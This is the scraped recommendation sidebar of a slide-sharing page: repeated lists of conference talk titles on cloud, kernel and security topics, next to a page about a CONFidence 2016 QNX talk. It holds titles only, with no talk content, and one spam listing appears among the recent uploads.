OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728
OpenStack Korea 2015 상반기스터디(devops) 스크립트로 오픈스택 설치하기 20150728
 
Open stack day 2014 havana from grizzly
Open stack day 2014 havana from grizzlyOpen stack day 2014 havana from grizzly
Open stack day 2014 havana from grizzly
 
Kernel Recipes 2015 - Porting Linux to a new processor architecture
Kernel Recipes 2015 - Porting Linux to a new processor architectureKernel Recipes 2015 - Porting Linux to a new processor architecture
Kernel Recipes 2015 - Porting Linux to a new processor architecture
 
CloudStackユーザ会〜仮想ルータの謎に迫る
CloudStackユーザ会〜仮想ルータの謎に迫るCloudStackユーザ会〜仮想ルータの謎に迫る
CloudStackユーザ会〜仮想ルータの謎に迫る
 
Secure lustre on openstack
Secure lustre on openstackSecure lustre on openstack
Secure lustre on openstack
 
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみる
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみるK8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみる
K8s上の containerized cloud foundryとcontainerized open stackをprometheusで監視してみる
 
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA Architecture
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA ArchitectureRed Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA Architecture
Red Hat Enterprise Linux OpenStack Platform 7 - VM Instance HA Architecture
 
kdump: usage and_internals
kdump: usage and_internalskdump: usage and_internals
kdump: usage and_internals
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysis
 
Elastic 101 tutorial - Percona Europe 2018
Elastic 101 tutorial - Percona Europe 2018 Elastic 101 tutorial - Percona Europe 2018
Elastic 101 tutorial - Percona Europe 2018
 
Percona XtraDB 集群内部
Percona XtraDB 集群内部Percona XtraDB 集群内部
Percona XtraDB 集群内部
 
Vbox virtual box在oracle linux 5 - shoug 梁洪响
Vbox virtual box在oracle linux 5 - shoug 梁洪响Vbox virtual box在oracle linux 5 - shoug 梁洪响
Vbox virtual box在oracle linux 5 - shoug 梁洪响
 
PuppetConf 2016: Nano Server, Puppet, and DSC
PuppetConf 2016: Nano Server, Puppet, and DSCPuppetConf 2016: Nano Server, Puppet, and DSC
PuppetConf 2016: Nano Server, Puppet, and DSC
 
BlueHat v18 || A mitigation for kernel toctou vulnerabilities
BlueHat v18 || A mitigation for kernel toctou vulnerabilitiesBlueHat v18 || A mitigation for kernel toctou vulnerabilities
BlueHat v18 || A mitigation for kernel toctou vulnerabilities
 
Trove Updates - Kilo Edition
Trove Updates - Kilo EditionTrove Updates - Kilo Edition
Trove Updates - Kilo Edition
 
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...
XPDS14: Efficient Interdomain Transmission of Performance Data - John Else, C...
 
On-Demand Image Resizing
On-Demand Image ResizingOn-Demand Image Resizing
On-Demand Image Resizing
 
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
BlueHat v18 || Straight outta v mware - modern exploitation of the svga devic...
 
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_finalCSW2017 Qinghao tang+Xinlei ying vmware_escape_final
CSW2017 Qinghao tang+Xinlei ying vmware_escape_final
 

Viewers also liked

[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...PROIDEA
 
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...PROIDEA
 
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...PROIDEA
 
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...PROIDEA
 
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...PROIDEA
 
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...PROIDEA
 
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomadAtmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomadPROIDEA
 
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...PROIDEA
 
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...PROIDEA
 
[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea...
[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea...[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea...
[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea...PROIDEA
 
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz][4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]PROIDEA
 
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...PROIDEA
 
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...PROIDEA
 
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst [CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst PROIDEA
 
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)PROIDEA
 
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...PROIDEA
 
[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)PROIDEA
 

Viewers also liked (17)

[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
[4developers2016] - Nowe wyzwania w tworzeniu Universal Windows Application n...
 
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
Atmosphere 2016 - Jan Mussler - ZMON: Zalando's OS approach to monitoring in...
 
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
Nawyki kognitywne zwiększające efektywność i skuteczność programisty (Artur K...
 
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
Atmosphere 2016 - Janusz Dabrowski - DX & Digital Performance Platform - crit...
 
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
MCE^3 - Dariusz Seweryn, Paweł Urban - Demystifying Android's Bluetooth Low ...
 
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
Atmosphere 2016 - Kamil Szymanski - Creating Jenkins pipelines with groovy-b...
 
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomadAtmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
Atmosphere 2016 - Diptanu Choudhury - Taming the public clouds with nomad
 
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
[CONFidence 2016] Gaweł Mikołajczyk - Making sense out of the Security Operat...
 
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
[CONFidence 2016] Jakub Kałużny, Mateusz Olejarka - Big problems with big dat...
 
[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea...
[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea...[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea...
[CONFidence 2016] Abraham Aranguren, Fabian Fäßler - Smart Sheriff, Dumb Idea...
 
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz][4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
[4developers2016] - Medytacja dla programistów [Krzysztof Muchewicz]
 
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
[CONFidence 2016] Dmitry Chastuhin, Dmitry Yudin - SAP, dos, dos, race condi...
 
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
[CONFidence 2016] Marcin Kaczmarek - Security and forensic projects based on ...
 
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst [CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
[CONFidence 2016] Jacek Grymuza - From a life of SOC Analyst
 
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
[4developers2016] - Nie rób makiet. Nadawaj im znaczenie (Łukasz Tyrała)
 
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
[4developers2016] Dlaczego stalkuje userów i ty też powinieneś zacząć. (Grzeg...
 
[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)[4developers2016] PHP 7 (Michał Pipa)
[4developers2016] PHP 7 (Michał Pipa)
 

Similar to [CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Microkernel ain't one!

[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVROpenStack Korea Community
 
Metal-k8s presentation by Julien Girardin @ Paris Kubernetes Meetup
Metal-k8s presentation by Julien Girardin @ Paris Kubernetes MeetupMetal-k8s presentation by Julien Girardin @ Paris Kubernetes Meetup
Metal-k8s presentation by Julien Girardin @ Paris Kubernetes MeetupLaure Vergeron
 
VMware NSX - Lessons Learned from real project
VMware NSX - Lessons Learned from real projectVMware NSX - Lessons Learned from real project
VMware NSX - Lessons Learned from real projectDavid Pasek
 
VMware ESXi - Intel and Qlogic NIC throughput difference v0.6
VMware ESXi - Intel and Qlogic NIC throughput difference v0.6VMware ESXi - Intel and Qlogic NIC throughput difference v0.6
VMware ESXi - Intel and Qlogic NIC throughput difference v0.6David Pasek
 
See what happened with real time kvm when building real time cloud pezhang@re...
See what happened with real time kvm when building real time cloud pezhang@re...See what happened with real time kvm when building real time cloud pezhang@re...
See what happened with real time kvm when building real time cloud pezhang@re...LinuxCon ContainerCon CloudOpen China
 
Openstack days taiwan 2016 0712
Openstack days taiwan 2016 0712Openstack days taiwan 2016 0712
Openstack days taiwan 2016 0712Naoto Gohko
 
GPU Accelerated Virtual Desktop Infrastructure (VDI) on OpenStack
GPU Accelerated Virtual Desktop Infrastructure (VDI) on OpenStackGPU Accelerated Virtual Desktop Infrastructure (VDI) on OpenStack
GPU Accelerated Virtual Desktop Infrastructure (VDI) on OpenStackBrian Schott
 
Cloud-native .NET-Microservices mit Kubernetes @BASTAcon
Cloud-native .NET-Microservices mit Kubernetes @BASTAconCloud-native .NET-Microservices mit Kubernetes @BASTAcon
Cloud-native .NET-Microservices mit Kubernetes @BASTAconMario-Leander Reimer
 
Sample Lucene Big Data Diagram Generic
Sample Lucene Big Data Diagram GenericSample Lucene Big Data Diagram Generic
Sample Lucene Big Data Diagram GenericKen Irwin
 
Evolution of Openstack Networking at CERN
Evolution of Openstack Networking at CERNEvolution of Openstack Networking at CERN
Evolution of Openstack Networking at CERNBelmiro Moreira
 
PuppetConf 2016: Building Nano Server Images with Puppet and DSC – Michael Sm...
PuppetConf 2016: Building Nano Server Images with Puppet and DSC – Michael Sm...PuppetConf 2016: Building Nano Server Images with Puppet and DSC – Michael Sm...
PuppetConf 2016: Building Nano Server Images with Puppet and DSC – Michael Sm...Puppet
 
1 m+ qps on mysql galera cluster
1 m+ qps on mysql galera cluster1 m+ qps on mysql galera cluster
1 m+ qps on mysql galera clusterOlinData
 
Building virtualised CloudStack test environments
Building virtualised CloudStack test environmentsBuilding virtualised CloudStack test environments
Building virtualised CloudStack test environmentsShapeBlue
 
syzkaller: the next gen kernel fuzzer
syzkaller: the next gen kernel fuzzersyzkaller: the next gen kernel fuzzer
syzkaller: the next gen kernel fuzzerDmitry Vyukov
 
Whats new in neutron for open stack havana
Whats new in neutron for open stack havanaWhats new in neutron for open stack havana
Whats new in neutron for open stack havanaKamesh Pemmaraju
 
Advanced Tools and Techniques for Troubleshooting NetScaler Appliances
Advanced Tools and Techniques for Troubleshooting NetScaler AppliancesAdvanced Tools and Techniques for Troubleshooting NetScaler Appliances
Advanced Tools and Techniques for Troubleshooting NetScaler AppliancesDavid McGeough
 
Velocity 2012 - Learning WebOps the Hard Way
Velocity 2012 - Learning WebOps the Hard WayVelocity 2012 - Learning WebOps the Hard Way
Velocity 2012 - Learning WebOps the Hard WayCosimo Streppone
 
DockerCon14 Performance Characteristics of Traditional VMs vs. Docker Containers
DockerCon14 Performance Characteristics of Traditional VMs vs. Docker ContainersDockerCon14 Performance Characteristics of Traditional VMs vs. Docker Containers
DockerCon14 Performance Characteristics of Traditional VMs vs. Docker ContainersDocker, Inc.
 
David Bartlett-current
David Bartlett-currentDavid Bartlett-current
David Bartlett-currentDave Bartlett
 

Similar to [CONFidence 2016]: Alex Plaskett, Georgi Geshev - QNX: 99 Problems but a Microkernel ain't one! (20)

[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR[OpenStack 하반기 스터디] HA using DVR
[OpenStack 하반기 스터디] HA using DVR
 
Metal-k8s presentation by Julien Girardin @ Paris Kubernetes Meetup
Metal-k8s presentation by Julien Girardin @ Paris Kubernetes MeetupMetal-k8s presentation by Julien Girardin @ Paris Kubernetes Meetup
Metal-k8s presentation by Julien Girardin @ Paris Kubernetes Meetup
 
VMware NSX - Lessons Learned from real project
VMware NSX - Lessons Learned from real projectVMware NSX - Lessons Learned from real project
VMware NSX - Lessons Learned from real project
 
VMware ESXi - Intel and Qlogic NIC throughput difference v0.6
VMware ESXi - Intel and Qlogic NIC throughput difference v0.6VMware ESXi - Intel and Qlogic NIC throughput difference v0.6
VMware ESXi - Intel and Qlogic NIC throughput difference v0.6
 
See what happened with real time kvm when building real time cloud pezhang@re...
See what happened with real time kvm when building real time cloud pezhang@re...See what happened with real time kvm when building real time cloud pezhang@re...
See what happened with real time kvm when building real time cloud pezhang@re...
 
Openstack days taiwan 2016 0712
Openstack days taiwan 2016 0712Openstack days taiwan 2016 0712
Openstack days taiwan 2016 0712
 
GPU Accelerated Virtual Desktop Infrastructure (VDI) on OpenStack
GPU Accelerated Virtual Desktop Infrastructure (VDI) on OpenStackGPU Accelerated Virtual Desktop Infrastructure (VDI) on OpenStack
GPU Accelerated Virtual Desktop Infrastructure (VDI) on OpenStack
 
Cloud-native .NET-Microservices mit Kubernetes @BASTAcon
Cloud-native .NET-Microservices mit Kubernetes @BASTAconCloud-native .NET-Microservices mit Kubernetes @BASTAcon
Cloud-native .NET-Microservices mit Kubernetes @BASTAcon
 
Sample Lucene Big Data Diagram Generic
Sample Lucene Big Data Diagram GenericSample Lucene Big Data Diagram Generic
Sample Lucene Big Data Diagram Generic
 
Evolution of Openstack Networking at CERN
Evolution of Openstack Networking at CERNEvolution of Openstack Networking at CERN
Evolution of Openstack Networking at CERN
 
PuppetConf 2016: Building Nano Server Images with Puppet and DSC – Michael Sm...
PuppetConf 2016: Building Nano Server Images with Puppet and DSC – Michael Sm...PuppetConf 2016: Building Nano Server Images with Puppet and DSC – Michael Sm...
PuppetConf 2016: Building Nano Server Images with Puppet and DSC – Michael Sm...
 
1 m+ qps on mysql galera cluster
1 m+ qps on mysql galera cluster1 m+ qps on mysql galera cluster
1 m+ qps on mysql galera cluster
 
Building virtualised CloudStack test environments
Building virtualised CloudStack test environmentsBuilding virtualised CloudStack test environments
Building virtualised CloudStack test environments
 
syzkaller: the next gen kernel fuzzer
syzkaller: the next gen kernel fuzzersyzkaller: the next gen kernel fuzzer
syzkaller: the next gen kernel fuzzer
 
Whats new in neutron for open stack havana
Whats new in neutron for open stack havanaWhats new in neutron for open stack havana
Whats new in neutron for open stack havana
 
Advanced Tools and Techniques for Troubleshooting NetScaler Appliances
Advanced Tools and Techniques for Troubleshooting NetScaler AppliancesAdvanced Tools and Techniques for Troubleshooting NetScaler Appliances
Advanced Tools and Techniques for Troubleshooting NetScaler Appliances
 
Velocity 2012 - Learning WebOps the Hard Way
Velocity 2012 - Learning WebOps the Hard WayVelocity 2012 - Learning WebOps the Hard Way
Velocity 2012 - Learning WebOps the Hard Way
 
DockerCon14 Performance Characteristics of Traditional VMs vs. Docker Containers
DockerCon14 Performance Characteristics of Traditional VMs vs. Docker ContainersDockerCon14 Performance Characteristics of Traditional VMs vs. Docker Containers
DockerCon14 Performance Characteristics of Traditional VMs vs. Docker Containers
 
David Bartlett-current
David Bartlett-currentDavid Bartlett-current
David Bartlett-current
 
RunX ELCE 2020
RunX ELCE 2020RunX ELCE 2020
RunX ELCE 2020
 

Recently uploaded

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 

Recently uploaded (20)

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Powerful Google developer tools for immediate impact! (2023-24 C)
